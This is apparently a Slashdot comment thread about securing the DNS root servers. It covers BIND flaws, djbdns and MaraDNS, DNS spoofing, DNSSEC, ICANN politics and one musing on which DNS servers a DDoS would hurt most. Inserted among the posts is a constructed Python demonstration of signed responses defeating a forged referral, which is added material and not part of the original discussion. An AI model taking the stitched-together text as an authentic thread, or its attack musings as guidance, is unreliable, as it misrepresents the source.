I know, DJBDNS isn't for everyone. It doesn't have an FSF-approved license, and of course, carries design features stemming from Dan's immense ego. But it serves as an example that reliability, efficiency, and security are out there. Between it and the other alternatives, I think that it's inexcusable for the root name servers to run BIND, and I can't think of any reason why anyone would want to use it. But hey, that's just me.
Shoot, with all the recent talk about clusters, they could use an extremely scalable cluster of commodity hardware for a relative pittance. Put a traffic director using LVS in front of a number of single- or dual-CPU machines, all of them (including the director) commodity hardware, and you have the capability to serve out over a gigabit/second of DNS- securely, reliably, efficiently. It's hard to ask for more.
steve
Oh, you're not stuck, you're just unable to let go of the onion rings.
Was it just me or did the description give the impression that we were actually going to be told WHAT security measures were being proposed? Instead they say physical security is the least important and we'll have a meeting because of the terrorists. Oh and by the way... There are probably holes in BIND. Kinda like saying water is wet!
Normal people worry me!
<generalisation type="Sweeping"> Most of the default systems that the Internet is based on are inadequate for the expectations of business. There are plenty of alternatives that do work but it's often down to trusting your ISP that their systems are sufficiently bulletproof, and things like that are often not included in SLAs, and indeed not even considered. I'd love someone to show me an ISP who consider these things business critical. </generalisation>
There's an alternative like MaraDNS, which is public domain.
I don't think it supports Bind's and DjbDNS zone files yet, but i believe it's coming along nicely.
Does anyone have experience with it?
Well, don't worry about that. We can get you back before you leave. (Dr. Who)
I agree that the "domain land grab" was very silly. It was all about greed and promised very little in return for the $50,000+ that some companies and individuals paid for their domains.
However, I am compelled to point out that the "mindshare" for which these organizations compete is real. Consider the example of whitehouse.gov vs whitehouse.com. The latter definitely exploited the mindshare of the former in order to grab a larger audience.
Even SlashDot has a piece of your mind.
Common implementations of DNS and even the protocol itself have quite a number of flaws which make DNS spoofing rather easy. DNS spoofing is targeted at the clients, and the root servers have nothing to do with it, so you can't solve this problem at the root servers. DNSSEC won't solve it completely either because no one expects clients to move to DNSSEC anytime soon (you don't install full resolvers on clients, either).
In addition, occasionally, DNS database entries are wrong (although the servers are operating correctly), due to maintenance errors or social engineering attacks. Security on the root servers or even DNSSEC does not address this problem at all.
So the best solution is not to base any authentication on DNS names at all. (Then there's hardly any need for DNSSEC either.) Of course, quite a few Internet users rely heavily on the non-existent DNS security. They fetch mail using unencrypted POP3, use HTTP-based mail solutions, and so on, and if someone is able to redirect their connections as a consequence of DNS spoofing, he can obtain their passwords pretty easily. But reasonably secure solutions (e.g. TLS and server certificates) already exist.
100 Gb hard disks are cheap nowadays, and almost all OS support > 2Gb files. So securing the DNS from the roots up is simple : have a local /etc/hosts file with all existing hosts.
Then, subscribe to a mailing list that sends daily changes, so that you can keep your /etc/hosts file up to date.
Ehm... yeah. You first have to secure mail to do this.
Use BIND 9! A new security hole is discovered in BIND 4 and BIND 8 every couple of months. The quality of the BIND 8 code is so poor, that a complete rewrite was needed for BIND 9. Consequently, BIND 9 is much less likely than BIND 8 to throw up new security holes.
The story can be found here. The differences between BIND 8 and BIND 9 are highlighted in this quote:
"The basic sleazeware produced in a drunken fury by a bunch of U C Berkeley grad students was still at the core of BIND", according to Paul Vixie, BIND9 architect. This rickety software structure was not judged an adequate basis for the complex changes needed by DDNS and DNSSec, so a decision was made to completely rewrite bind. In 1998, Jerry Scharf, who was the Executive Director of ISC, convinced the remaining UNIX vendors and a few government agencies that the only way to support all of the new DNS protocol enhancements was to totally rewrite BIND. As a result, in August of 1998 DARPA awarded a contract to TIS (NAI labs) to write the software in collaboration with ISC.
Would a (D)DOS attack be better off trying to hit the .com server(s)?
In addition, an attack on the .com servers is going to be far more "useful" than an attack on the root servers - after all, the root servers are hardly ever used (OK, the entry for Vanuatu (.NH?) might not be in your (or your ISPs) cache, so you may be successful in taking that out - but you can be pretty sure .com TLD is in your cache, so you're not going to see any results with an attack on the root servers. But an attack on the .com server will be of more use, in that you won't be able to access domains that aren't in your cache (such as kava.com) - but again you'll still have access to ones that are (e.g. yahoo.com)
I'm behind a proxy, so I can't find out how many servers there are at present - but I bet it's less than 13.
"Making linux GPL was the best thing I ever did" - Torvalds. I'd hate to see the worst thing...
Note that one should not confuse this article with DNSSEC, which also talks about securing DNS. DNSSEC (as described in RFC2535 and followups) describes the securing of DNS to give authenticity and integrity within DNS. It does not imply DDOS attack resolving, as described here.
"...From The Roots Up"?
C'mon Timothy, everyone knows that in computer science trees grow from the root DOWN.
Sheesh.
(Yes, this is a lame attempt at humor...)
n/t
We're talking about labels, IP's and canonical names...standard host file format. Impossible to do this in 15 chars and still make it work for rational use (this would be nice to have in a database as well...wonder what size we're looking at in SQL). Uncompressed so you can read it when DNS dies. Not my problem if you don't have an app that will read large text files :) This is an exercise, so bend a little, ok?
:)
I'm seeing a minimum 1500 chars per page to a max of 3000...forty lines of text...minimum 40 chars. (40 X 40 as an example). And this works out to an average of perhaps 4000 bytes. That makes my 30% 'page' usage figure a bit low...I'll double it and state that we would need 500 CD-R's for each ten million domains.
According to DomainStats.com:
http://www.domainstats.com/
...there are currently 36,148,270 registered domains.
3.6 times 500 = 1,800 CD-Rs. I'll say 1500 ~ 2000 CD-R's to hold a hosts.txt file that contains all currently registered domains worldwide. Roughly 1000 gb's....ten 100 gb drives. No sweat....I'll have them online by EOY. Now all I need is a small script to write out every DNS it can sniff and we're gold
Do not use microsoft products
ICANN would like to replace the root DNS systems with secured servers.
Step 1) install XP.
Step 2) Activate Raw Sockets
Step 3) Give everyone the IP address 0.0.0.0
Step 4) Shut the machine off.
It is now secure.
If it is not on fire, it is a software problem.
Screw it, I've given up DNS. I just sit there with the list and resolve the addresses myself.
Poorly edited, poorly written. What was his conclusion anyway? Maybe I'm looking for too many technical details, but ending with "diversity improves security" implies that the solution is simply to replace *some* BIND servers with other servers. Yeah, that should work. Duh.
He went on to argue that "most security holes are due to buggy software. All the cryptography in the world is not going to change the buggy software problem."
In my experience, most security holes are caused by careless or ignorant users. Even if you take all the bugs out of all the software, there are still going to be security holes. It's like the locked doors at work: secure entrances are pointless if you hold the door open for the guy behind you (and you don't know the guy behind you).
The Daily Build
DNS is the lifeblood of the current internet architecture and it's how hosts find each other, critical for communication.
My first question would be, does this new architecture enable a more discriminatory type of control which would regulate how information is routed, as well as who it gets routed to?
dynamic IP addresses can use a dyndns service, which would mean the security issue on the host is resolved, though securing an adsl connection brings other security issues, and the dynamic DNS service would still be vulnerable to ddos attacks.
It's quite funny actually. DJB has gained so much by creating qmail that when he released djbdns, users blindly followed into it expecting it to be void of security holes.
the biggest problems with DNS on the internet have NOTHING to do with the software used. the protocol itself is quite insecure- and what's worse is that this isn't news!
one thing that certainly needs to change is this silly concept of recursive-resolvers; they change the responses, and thus it's next to impossible to determine which is the "Real" resolver.
thanks to sequence prediction, and because DNS servers/clients don't have any "other" protection, it's quite trivial to smash or alter someone's dns tables (during a zone transfer), or redirect users someplace else (when doing recursion).
what we need is a cryptographic method of "signing" requests. root nameservers should maintain keys in addition to NS rrs. And what bind calls "root hints" should contain the keys of the root nameservers. this way, we can digitally sign responses so that their authenticity can be verified. moreover, if packet-space is limited (and even though a "most" queries should have a hundred or three bytes free) we could always just store a hash of the signature. but that's getting too far into implementation.
the basic droll is that we need something BETTER than dns... not just new software, but a new design...
and plus, by implementing crypto into the name services, we'll be able to finally keep the french off the internet.
(for those of you lacking any kind of crypto-political background: the french aren't allowed ANY cryptography.... and you thought US export control was bad!)
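The signed-response idea in this post, together with the spoofing concern raised earlier in the thread (an unsigned answer is matched only by its 16-bit ID and question), as an added example that is not from the article or from any DNS implementation. The keys, server list and records are constructed, and an HMAC stands in for the public-key signature a real scheme would use:

```python
import hashlib
import hmac

# Added example, not code from the article or from any DNS software. In the proposal
# above, the keys below would ship with the root hints next to the server addresses.
# A deployed scheme uses public-key signatures (DNSSEC); the standard library has no
# asymmetric signing, so a per-server HMAC stands in here, the way TSIG (RFC 2845)
# authenticates traffic between servers that share a key. Keys and records are
# constructed; the server names are the real root server names.
ROOT_HINT_KEYS = {
    "a.root-servers.net.": b"constructed-key-for-a",
    "b.root-servers.net.": b"constructed-key-for-b",
}


def canonical(resp: dict) -> bytes:
    """Serialise the fields a forger would want to change, in a fixed, case-folded order."""
    rrs = sorted(resp["answers"])
    parts = [str(resp["id"]), resp["qname"].lower(), resp["qtype"], resp["server"]]
    parts += [f"{name.lower()} {rtype} {rdata.lower()}" for name, rtype, rdata in rrs]
    return "\n".join(parts).encode()


def sign_response(resp: dict, key: bytes) -> bytes:
    """What a root server holding `key` would attach to its answer."""
    return hmac.new(key, canonical(resp), hashlib.sha256).digest()


def accepted_by_id_only(query: dict, resp: dict) -> bool:
    """The only check an unsigned resolver can make: the 16-bit ID and question must match."""
    return (query["id"] == resp["id"]
            and query["qname"].lower() == resp["qname"].lower()
            and query["qtype"] == resp["qtype"])


def verify_response(query: dict, resp: dict, sig: bytes) -> bool:
    """Signed check: ID/question must match AND the signature must verify under a root-hints key."""
    if not accepted_by_id_only(query, resp):
        return False
    key = ROOT_HINT_KEYS.get(resp["server"])
    if key is None:
        return False   # the answer claims a server for which we hold no key
    expected = hmac.new(key, canonical(resp), hashlib.sha256).digest()
    return hmac.compare_digest(sig, expected)


# Constructed traffic: one query, the genuine referral, and a forgery that guessed the
# transaction ID and points the .com delegation somewhere else.
QUERY = {"id": 0x2F1A, "qname": "example.com.", "qtype": "NS"}
GENUINE = {**QUERY, "server": "a.root-servers.net.",
           "answers": [("com.", "NS", "a.gtld-servers.net.")]}
GENUINE_SIG = sign_response(GENUINE, ROOT_HINT_KEYS["a.root-servers.net."])
FORGED = {**QUERY, "server": "a.root-servers.net.",
          "answers": [("com.", "NS", "ns.forged.invalid.")]}
FORGED_SIG = sign_response(FORGED, b"key-the-forger-made-up")

if __name__ == "__main__":
    for label, resp, sig in [("genuine", GENUINE, GENUINE_SIG), ("forged", FORGED, FORGED_SIG)]:
        print(f"{label:8} id-only: {accepted_by_id_only(QUERY, resp)}  "
              f"signed: {verify_response(QUERY, resp, sig)}")
```

The ID-only check accepts both answers, which is the weakness this post and the earlier spoofing post describe; the signed check accepts only the one made with the key the resolver already held.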
The officials that kept postponing the emmy awards. Self-important people that believe they have to be at the center of terrorist plans, because _everyone_ knows how important they are.
Maybe we need 4 or 5 independent "root" zones, completely autonomous from each other, if this is such a real problem. Sure, you'd wake up one morning and dotcom/net/org might not work, but quite a few others would. If we did that though, ICANN couldn't remain the heavy-handed tyrant that they are, now could they? With all these liberal definitions of terrorism floating around, it might be possible to say with a straight face, that the only dns terrorists out there sit on the board of ICANN.
The biggest hurdle to implementing such a system is the learning curve for the cryptographic APIs for the languages I'd want to use. There is not a wealth of information on such APIs to begin with. The next biggest hurdle, of course, being that if it were developed inside the US, it'd probably be considered an act of terrorism to ship it outside the US.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
djbdns (and qmail, etc) are NOT under a restrictive license as you like to argue. In fact, they are under no license. DJB simply doesn't believe that software licenses are valid, so he doesn't grant one. His "license" page that you refer to simply reiterates his right of first distribution, as well as waiving some of his right to first distribution under certain circumstances. Read this for more background on why DJB doesn't issue licenses.
The only appearance of the word license on that page is in a quote from a RedHat employee, not DJB. It would seem impossible to me to grant a license without specifically stating that you are granting a license.
The inability to change pathnames is a bunch of hooey. I've seen packages included with a major distribution that could have been modified to use paths that make more sense, but have been packaged with the author's defaults instead.
xjosh
Seriously, though, that works well when you've got one box sitting out there, but a lot of services install round robin DNS with multiple servers for load balancing. Try "dig yahoo.com" or lycos or google, for example. Socks3 here at work consists of about 9 servers, only three of which seem to work with any reliability.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
Here's one for 'ya: don't run named as root! The past several versions allow named to switch to an alternate user once the binding to port 53 is complete. In fact, most distributions now come with that enabled by default.
There's no excuse for sloppy administration.
The link above is a site that has been known to often send people to goatse.cx.
-no broken link
What a bunch of slanderous HORSESHIT.
Yes, I believe you are oversimplifying. The issue at stake is not to find the gizmo rel.3 fix which will allow a perfectly technical solution. The real problem is political: the US is unwilling to relinquish control of the root servers to anybody but ICANN, a corporation which is still under tight DoC control, but is supposed to govern the planetary Internet. Did I hear "There the Americans go again.."? Right, they do. Until such a moment when a full international organisation, acting by a charter agreed upon by regional world (which is indeed slightly bigger than Texas + Washington and NY) representatives, takes control of the root servers, a practical solution is very hard to achieve. The 'nice pot of money' for domain names currently goes into: - first and foremost, commercial registrars' balance sheet; - lavish pay of ICANN officers. Not to ruggedized RAID DNS servers...
Thufir Hawat
Part-time Mentat
- MAC is a huge kludge. It is used to enforce read/write restrictions on /etc and such in TOS. Why not just use ACLs and be done with it?
- I can tell you that it is 99% likely that a root user at any MAC label can most likely compromise the system. It is just too hard to lock down root.
- Privileges are a joke. Most setuid root programs need both setuid root plus a load of privileges in Trusted Solaris, in order to function properly. How do you make /usr/bin/passwd work without giving the executable write access to /etc/passwd? Well, that just means that if you can exploit /usr/bin/passwd (as you could do with several linker, libc/locale, and other exploits) you can 0wn the system. Just like under Solaris.
- Most of the features in a B1 TOS like TSol are designed just to get the B1 rating. But in order to make the system usable, many "features" (like telnetd, /usr/bin/passwd, and such) are added which effectively compromise the security of the system and defeat the purpose.
- The vast majority of Internet sites would not benefit from information flow control. It is bloat at best.
Looking at TSol, I at first got a false sense of security. But then I realized that there were a lot of failure modes to think about. They're just different vulnerabilities, not necessarily fewer. All they've got going for them is security through obscurity, and that won't stand if a lot of people start using the system.
~wally
So for some of you wizards so bored you are about to *gasp* watch TV....
Wouldn't DNS be the ultimate peer-to-peer application?
Send valuable ideas, donations and flames to:
Thrazzle@yahoo.com
Why doesn't Google come up with a way to do DNS? I mean, people already go there to search for stuff.
Besides, DNS servers need to be decentralized. ICANN is the single point of failure. Do a complete decentralization, have a faster propagation theme (ala Gnutella if you like)...
Something along those lines...
DNS should not "belong" to any one entity. If 30% of the net falls off due to DNS attacks, the other 70% should be able to keep right on ticking.
The whole thing should be automated and dynamic.
Heck, there should not even be an ICANN.
Let's say I register my domain name, then get my IP from my lovely web host, and put a text file (xml or otherwise) on my root directory (like "dns.xml"), and go to google to notify them, then they handle the propagation. This is kind of what UDDI is supposed to do.
Also, the browsers should not only cache the IP of web pages they go to, but be able to automatically check these against some server during idle time (god knows there's idle time on my pc).
"Piter, too, is dead."
I like that they mentioned that diversity results in more security (at the very end of the article). This is one of the major problems with Microsoft products: they only make two operating systems, so when a bug is found in one or both of them, the whole world goes down from some email script virus that a child can write. Under the alternative Linux and BSDs, there are differences between the distributions and even between installations, resulting in big headaches for would-be virus writers. (Sure, this also results in headaches for developers, but who said that making software is easy? Yeah, developing is allegedly "easy" under Microsoft platforms, potentially saving your business big dollars in R&D, but that money gets thrown away on the inevitable repairs necessary after some k1ddy in Congo or something manages to deploy a virus.)
So, like the article says, diversity improves security. In my opinion, each site should choose the best system for the job and configure it to do that job well. If you end up with 10 different platforms and operating systems, so be it.
Oh well.
Oh yeah, so what I was trying to say is that not only the operating system, but also the software running on it, should be diverse and come from as many different sources as possible. I would even say that if you run several machines that perform the same job, perform that job with different software on the several machines. This way, when one gets cracked, the others continue to work (at least for a while).
I don't think so. As faulty as BIND is, I sure as hell don't want to rely on the limited resources available to a single vendor - which just so happens to own the software that controls DNS all over the world.
Uh uh. Save that crap for some alternate universe.
Max
My god carries a hammer. Your god died nailed to a tree. Any questions?
My uptimes for Linux are controlled strictly by the power company :( As long as you disable unneeded services (just about all of them) and block all incoming stuff through firewall rules, you shouldn't have a problem.